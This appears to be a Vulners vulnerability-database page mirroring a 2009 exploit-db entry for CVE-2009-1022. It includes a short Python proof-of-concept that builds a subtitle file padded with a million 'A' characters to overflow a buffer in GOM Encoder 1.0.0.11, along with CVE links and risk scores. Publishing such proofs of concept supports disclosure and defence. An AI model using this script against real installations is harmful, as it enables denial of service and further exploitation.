Lucene search
+L

Gretech GOM Encoder 1.0.0.11 - '.Subtitle' Buffer Overflow (PoC)

🗓️ 16 Mar 2009 00:00:00Reported by Encrypt3d.M!ndType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 34 Views

GOM Encoder 1.0.0.11 subtitle buffer overflow exploi

Related
Code
ReporterTitlePublishedViews
Family
circl
Circl
CVE-2009-1022
16 Mar 200900:00
circl
cve
CVE
CVE-2009-1022
20 Mar 200900:00
cve
cvelist
Cvelist
CVE-2009-1022
20 Mar 200900:00
cvelist
nvd
NVD
CVE-2009-1022
20 Mar 200900:30
nvd
prion
Prion
Heap overflow
20 Mar 200900:30
prion
#exploit.py
#
# Gom Encoder (Subtitle File) Buffer Overflow PoC
# by :Encrypt3d.M!nd
#
#  Orignal Advisory:
#  https://www.securityfocus.com/bid/34120
#

chars = 'A' * 1000000

file = open ( 'devil_inside.srt', 'w' )
file.write ('1\n00:00:00,001 --> 00:00:06,000\n'+chars)
file.close()

# milw0rm.com [2009-03-16]

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

16 Mar 2009 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 29.3
EPSS0.07424
34